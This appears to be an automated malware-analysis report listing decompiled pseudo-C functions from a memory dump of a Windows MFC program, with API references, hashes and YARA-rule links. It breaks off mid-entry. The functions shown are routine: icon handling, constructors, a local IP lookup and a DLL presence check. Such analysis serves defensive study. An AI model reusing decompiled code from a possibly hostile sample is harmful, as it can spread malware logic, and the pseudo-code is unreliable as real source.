Function 00401695, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401695(void* __ecx) {
				void* _t17;
				void* _t24;
				void* _t27;

				L004269E6();
				L00425E08();
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				L0042638A();
				_t17 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 8)))) + 0xc))( *((intOrPtr*)(_t27 - 0x10)), _t27 - 0x10, 0x8075, L00401FB9( *((intOrPtr*)(__ecx + 0x380))), _t24, __ecx);
				 *(_t27 - 4) =  *(_t27 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return _t17;
			}

0x0040d386
0x0040d392
0x0040d39d
0x0040d3b0
0x0040d3c0
0x0040d3c3
0x0040d3ca
0x0040d3d3
0x0040d3db

APIs

_EH_prolog.MSVCRT ref: 0040D386
#540.MFC42 ref: 0040D392
#2817.MFC42(?,00008075,00000000), ref: 0040D3B0
#800.MFC42 ref: 0040D3CA

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2817#540#800H_prolog
String ID:
API String ID: 1600685448-0
Opcode ID: 0948a97d998ffb4681851bdafb4a8756c2d715769cd209e97617a88bf2c6c92d
Instruction ID: 95dfc7d0001d97af2732ff64e08f49df20cff15594c9fda3c5365b2aa5317bd1
Opcode Fuzzy Hash: 0948a97d998ffb4681851bdafb4a8756c2d715769cd209e97617a88bf2c6c92d
Instruction Fuzzy Hash: A4F05471E106249BC705EB94D846AEEB378FF00318F40856FF422671D1DF785A04CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00423228, Relevance: 6.0, APIs: 4, Instructions: 27
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00423228(intOrPtr __ecx) {
				struct HICON__* _t15;
				void* _t16;
				intOrPtr _t24;
				void* _t26;

				L004269E6();
				_push(__ecx);
				_t24 = __ecx;
				 *((intOrPtr*)(_t26 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42f4a0;
				_t15 =  *(__ecx + 0x48);
				 *(_t26 - 4) = 1;
				if(_t15 != 0) {
					DestroyIcon(_t15);
					 *(_t24 + 0x48) =  *(_t24 + 0x48) & 0x00000000;
				}
				_t16 = E00401E51();
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				L00425DFC();
				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t26 - 0xc));
				return _t16;
			}

0x0042322d
0x00423232
0x00423234
0x00423236
0x00423239
0x0042323f
0x00423242
0x0042324b
0x0042324e
0x00423254
0x00423254
0x0042325b
0x00423260
0x00423267
0x0042326c
0x00423273
0x0042327c
0x00423284

APIs

_EH_prolog.MSVCRT ref: 0042322D
DestroyIcon.USER32(?), ref: 0042324E
#800.MFC42 ref: 00423267
#800.MFC42 ref: 00423273

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$DestroyH_prologIcon
String ID:
API String ID: 4212283764-0
Opcode ID: 5cbccab03c5fcaa86d6ee933441c5ccd33a687f4bbab4f1bfbbef26ab9712090
Instruction ID: 038419cbabf5ceb4558fd951412c38bc75bf0a30bb30eeb4090c0b998860b8d7
Opcode Fuzzy Hash: 5cbccab03c5fcaa86d6ee933441c5ccd33a687f4bbab4f1bfbbef26ab9712090
Instruction Fuzzy Hash: 2CF0B470A10720DBC724EF19D50579EB7F8AF04318F804A6EE042936E1CBF8AA08CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401118, Relevance: 6.0, APIs: 4, Instructions: 25
windowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401118(void* __ecx, intOrPtr _a4) {
				int _t6;
				intOrPtr _t7;
				struct HICON__** _t11;

				_t7 = _a4;
				_t11 = SendMessageA( *(__ecx + 0x20), 0x150,  *(_t7 + 8), 0);
				_t6 = DestroyIcon( *_t11);
				_push(_t11);
				L00425DF0();
				_push(_t7);
				L00426828();
				return _t6;
			}

0x0041d8b4
0x0041d8d0
0x0041d8d4
0x0041d8da
0x0041d8db
0x0041d8e1
0x0041d8e4
0x0041d8ec

APIs

SendMessageA.USER32 ref: 0041D8CA
DestroyIcon.USER32(00000000), ref: 0041D8D4
#825.MFC42(00000000), ref: 0041D8DB
#2582.MFC42(?), ref: 0041D8E4

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2582#825DestroyIconMessageSend
String ID:
API String ID: 1315100164-0
Opcode ID: 3b35bb35cc6f0c296f19d61580576fad930d890efddaef6455558b11b5490002
Instruction ID: 843c9e9be92369fec90ab699544b4c14ed6132900770cd7d464df2c84bbf804a
Opcode Fuzzy Hash: 3b35bb35cc6f0c296f19d61580576fad930d890efddaef6455558b11b5490002
Instruction Fuzzy Hash: DAE026773000107BE2006B55EC8AEBBBBACEFCC321F80003AF6058B160CE601C418768

Uniqueness

Uniqueness Score: -1.00%

Function 004126FF, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004126FF(intOrPtr* __ecx) {
				void* _t11;
				intOrPtr* _t18;
				void* _t20;

				L004269E6();
				_push(__ecx);
				_t18 = __ecx;
				 *((intOrPtr*)(_t20 - 0x10)) = __ecx;
				 *__ecx = 0x42e4cc;
				 *(_t20 - 4) = 2;
				_t11 = L0040212B(__ecx);
				 *(_t20 - 4) = 1;
				L00426504();
				 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
				L00426504();
				 *_t18 = 0x42e514;
				 *(_t20 - 4) = 3;
				L00426354();
				 *_t18 = 0x42c4fc;
				 *[fs:0x0] =  *((intOrPtr*)(_t20 - 0xc));
				return _t11;
			}

0x00412704
0x00412709
0x0041270b
0x0041270d
0x00412710
0x00412716
0x0041271d
0x00412725
0x00412729
0x0041272e
0x00412735
0x0041273a
0x00412742
0x00412749
0x00412751
0x00412758
0x00412760

APIs

_EH_prolog.MSVCRT ref: 00412704
#772.MFC42 ref: 00412729
#772.MFC42 ref: 00412735
#2438.MFC42 ref: 00412749

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #772$#2438H_prolog
String ID:
API String ID: 3110429667-0
Opcode ID: 1857e1bab3f59524de76d0b570f94e98c9fdf4f6e1f8755f63d4d1e0108dcb82
Instruction ID: 40acb17291f297ac7ff364638eb5e04f9ca002f17c80638e55893d232e1b17fd
Opcode Fuzzy Hash: 1857e1bab3f59524de76d0b570f94e98c9fdf4f6e1f8755f63d4d1e0108dcb82
Instruction Fuzzy Hash: 33F05EB0A10261EADB14EF95E11539DBBF4AF08308F91844FA44567282DBF85A48CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040868A, Relevance: 6.0, APIs: 4, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040868A(intOrPtr __ecx, void* __eflags) {
				void* _t13;
				void* _t23;

				L004269E6();
				_push(__ecx);
				 *((intOrPtr*)(_t23 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42c264;
				 *(_t23 - 4) = 1;
				L00425FB2();
				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
				_t13 = E00401776(__ecx + 0x4c);
				 *(_t23 - 4) = 2;
				L00425DFC();
				 *(_t23 - 4) =  *(_t23 - 4) | 0xffffffff;
				L00425FAC();
				 *[fs:0x0] =  *((intOrPtr*)(_t23 - 0xc));
				return _t13;
			}

0x0040868f
0x00408694
0x00408698
0x0040869b
0x004086a7
0x004086ae
0x004086b3
0x004086ba
0x004086c2
0x004086c9
0x004086ce
0x004086d4
0x004086dd
0x004086e5

APIs

_EH_prolog.MSVCRT ref: 0040868F
#686.MFC42 ref: 004086AE

Part of subcall function 00401776: _EH_prolog.MSVCRT ref: 004095F0
Part of subcall function 00401776: #2414.MFC42 ref: 00409615
Part of subcall function 00401776: #2414.MFC42 ref: 00409633
Part of subcall function 00401776: #800.MFC42 ref: 00409641
Part of subcall function 00401776: #800.MFC42 ref: 0040964D

#800.MFC42 ref: 004086C9
#813.MFC42 ref: 004086D4

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#2414H_prolog$#686#813
String ID:
API String ID: 3913026089-0
Opcode ID: 83339ceba757a708379911131cbb9e092580f24500055a0c7d7930d70503fa91
Instruction ID: 0afae61b7abf0a833ddaa2bcfd0d74808dc1803961c9ff420596e43840aea7bb
Opcode Fuzzy Hash: 83339ceba757a708379911131cbb9e092580f24500055a0c7d7930d70503fa91
Instruction Fuzzy Hash: 70F08270A25A30DBD714EF55D1057DDB7B4AF04308F50854EB052532C2CBB85A04C755

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0E6, Relevance: 6.0, APIs: 4, Instructions: 23
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041E0E6(void* __ecx, signed short _a4) {
				struct HINSTANCE__* _t6;
				struct HICON__* _t7;
				intOrPtr _t8;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				L00425E44();
				_t6 = _a4 & 0x0000ffff;
				_push(_t6);
				_push(0xe);
				L00425FFA();
				_t7 = LoadIconA(_t6, _t6);
				 *(_t12 + 0x94) = _t7;
				_t8 = 0x20;
				 *((intOrPtr*)(_t12 + 0xa0)) = _t8;
				 *((intOrPtr*)(_t12 + 0xa4)) = _t8;
				InvalidateRect( *(_t12 + 0x20), 0, 1);
				_t10 = 1;
				return _t10;
			}

0x0041e0e7
0x0041e0e9
0x0041e0ee
0x0041e0f3
0x0041e0f4
0x0041e0f7
0x0041e0fd
0x0041e105
0x0041e10b
0x0041e113
0x0041e119
0x0041e11f
0x0041e127
0x0041e129

APIs

#1168.MFC42 ref: 0041E0E9
#1146.MFC42(?,0000000E,?), ref: 0041E0F7
LoadIconA.USER32(00000000,?), ref: 0041E0FD
InvalidateRect.USER32(?,00000000,00000001), ref: 0041E11F

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1146#1168IconInvalidateLoadRect
String ID:
API String ID: 207787090-0
Opcode ID: 8c829e885d0125ee4ef96d0c51400144145fdfa8038c383796fc22f2e6471667
Instruction ID: 65b89f1b41569846a383c4487af8ac28437d0caf868fe324217721ce653cf508
Opcode Fuzzy Hash: 8c829e885d0125ee4ef96d0c51400144145fdfa8038c383796fc22f2e6471667
Instruction Fuzzy Hash: 6FE04FB66447106EE7209BB0AD0AFA7B6D8BF49701F000C1FB786DA1D0D6F594408714

Uniqueness

Uniqueness Score: -1.00%

Function 0041E3C0, Relevance: 6.0, APIs: 4, Instructions: 22
networkCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0041E3C0(intOrPtr _a4, signed int _a8) {
				signed int _v8;
				char _v264;
				char* _t13;
				intOrPtr* _t15;

				_v8 = _v8 & 0x00000000;
				gethostname( &_v264, 0xff);
				_t13 =  &_v264;
				_push(_t13);
				L00426FCA();
				_t15 =  *((intOrPtr*)( *((intOrPtr*)(_t13 + 0xc)) + _a8 * 4));
				_push( *_t15);
				L00426FD6();
				_push(_t15);
				L00425FB8();
				return _a4;
			}

0x0041e3c9
0x0041e3d9
0x0041e3de
0x0041e3e4
0x0041e3e5
0x0041e3f0
0x0041e3f3
0x0041e3f5
0x0041e3fd
0x0041e3fe
0x0041e407

APIs

gethostname.WSOCK32(?,000000FF), ref: 0041E3D9
gethostbyname.WSOCK32(?), ref: 0041E3E5
inet_ntoa.WSOCK32(?), ref: 0041E3F5
#537.MFC42(00000000,?,?,000000FF), ref: 0041E3FE

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #537gethostbynamegethostnameinet_ntoa
String ID:
API String ID: 1318074273-0
Opcode ID: 2a69c4fe989c606861920f9aa9c22065f9add5a15fc269c6bc6f63393da67204
Instruction ID: 01aa425ef99b51685310bb57ddb701172b0e319bb21b2b76e1516207d46871b0
Opcode Fuzzy Hash: 2a69c4fe989c606861920f9aa9c22065f9add5a15fc269c6bc6f63393da67204
Instruction Fuzzy Hash: EFE09B7460011DABCF10FF90E685EDCB3BCEF14308F424055F9049B151CA78EA44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0040E457, Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040E457(intOrPtr __ecx) {
				void* _t19;

				L004269E6();
				_push(__ecx);
				 *((intOrPtr*)(_t19 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42d6ec;
				 *(_t19 - 4) = 1;
				L004263CC();
				 *(_t19 - 4) =  *(_t19 - 4) & 0x00000000;
				L0042621C();
				 *(_t19 - 4) =  *(_t19 - 4) | 0xffffffff;
				L00426486();
				 *[fs:0x0] =  *((intOrPtr*)(_t19 - 0xc));
				return E00428BC5;
			}

0x0040e45c
0x0040e461
0x0040e465
0x0040e468
0x0040e474
0x0040e47b
0x0040e480
0x0040e48a
0x0040e48f
0x0040e495
0x0040e49e
0x0040e4a6

APIs

_EH_prolog.MSVCRT ref: 0040E45C
#609.MFC42 ref: 0040E47B
#656.MFC42 ref: 0040E48A
#784.MFC42 ref: 0040E495

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #609#656#784H_prolog
String ID:
API String ID: 3012625883-0
Opcode ID: 0ac3d6cae47286ba99be804dac153778baa0701ad1a09eb637d04917ba212c44
Instruction ID: c316f80fd35cf00be96ececb392aed7bc85cb27fa82fc85d950830cf825a6da0
Opcode Fuzzy Hash: 0ac3d6cae47286ba99be804dac153778baa0701ad1a09eb637d04917ba212c44
Instruction Fuzzy Hash: 7AE06DB0A11660DBC714EF54E5017DDBBB4BF04318F91428FE066932C2CBB81A04CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E147, Relevance: 6.0, APIs: 4, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040E147(intOrPtr __ecx) {
				void* _t19;

				L004269E6();
				_push(__ecx);
				 *((intOrPtr*)(_t19 - 0x10)) = __ecx;
				 *(_t19 - 4) = 1;
				L00425DFC();
				 *(_t19 - 4) =  *(_t19 - 4) & 0x00000000;
				L0042621C();
				 *(_t19 - 4) =  *(_t19 - 4) | 0xffffffff;
				L0042602A();
				 *[fs:0x0] =  *((intOrPtr*)(_t19 - 0xc));
				return E00428AB7;
			}

0x0040e14c
0x0040e151
0x0040e155
0x0040e15e
0x0040e165
0x0040e16a
0x0040e171
0x0040e176
0x0040e17c
0x0040e185
0x0040e18d

APIs

_EH_prolog.MSVCRT ref: 0040E14C
#800.MFC42 ref: 0040E165
#656.MFC42 ref: 0040E171
#641.MFC42 ref: 0040E17C

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #641#656#800H_prolog
String ID:
API String ID: 2213181565-0
Opcode ID: bf29c70bf3cd6272398e68785172102297e033305ee7671105049e83c8513938
Instruction ID: 28572771a5bc15e78d5540cebd24e5cf4414ebd6719155a124ec2ac63a43aeba
Opcode Fuzzy Hash: bf29c70bf3cd6272398e68785172102297e033305ee7671105049e83c8513938
Instruction Fuzzy Hash: 5FE06571A14624DBC718EBA5E4123DDBAA4AF04318F40828EA062A3282CFB81A04CA95

Uniqueness

Uniqueness Score: -1.00%

Function 00401361, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
libraryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00401361(void* __ecx, intOrPtr* _a4) {
				struct HINSTANCE__* _t8;
				intOrPtr* _t18;

				_t18 = _a4;
				 *((intOrPtr*)( *_t18 + 4))(0 |  *((intOrPtr*)(__ecx + 0x384)) == 0x00000000);
				_t8 = LoadLibraryA("CWUCliFr.dll");
				if(_t8 != 0) {
					FreeLibrary(_t8);
					_push(1);
					_pop(0);
				}
				return  *((intOrPtr*)( *_t18))(0);
			}

0x0040cb07
0x0040cb13
0x0040cb1b
0x0040cb23
0x0040cb26
0x0040cb2c
0x0040cb2e
0x0040cb2e
0x0040cb3b

APIs

LoadLibraryA.KERNEL32(CWUCliFr.dll), ref: 0040CB1B
FreeLibrary.KERNEL32(00000000), ref: 0040CB26

Strings

CWUCliFr.dll, xrefs: 0040CB16

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$FreeLoad
String ID: CWUCliFr.dll
API String ID: 534179979-2492026163
Opcode ID: e4a1bb750b23d573716a300471e8225639c7bbc0398fb7e64eec2067eb21041c
Instruction ID: beec5b583bfb1f5615f2ebbe713a08467ea77c348ce9e3b537d55a80308b79b4
Opcode Fuzzy Hash: e4a1bb750b23d573716a300471e8225639c7bbc0398fb7e64eec2067eb21041c
Instruction Fuzzy Hash: 35E0D831300201DFD700DF68A989B5B77F9AFC8740724C87AF046D7190CAB498439BB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040151E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040151E(intOrPtr* __ecx, intOrPtr __fp0) {

				L00426804();
				 *((intOrPtr*)(__ecx + 0x1c)) = 0x42ea40;
				asm("fld1");
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0x42ea28;
				 *((intOrPtr*)(__ecx + 0x3c)) = __fp0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				 *__ecx = 0x42ea10;
				return __ecx;
			}

0x0041c133
0x0041c13a
0x0041c141
0x0041c143
0x0041c146
0x0041c14d
0x0041c150
0x0041c153
0x0041c156
0x0041c159
0x0041c15c
0x0041c15f
0x0041c162
0x0041c16b

APIs

#341.MFC42 ref: 0041C133

Strings

(B, xrefs: 0041C146
@B, xrefs: 0041C13A

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
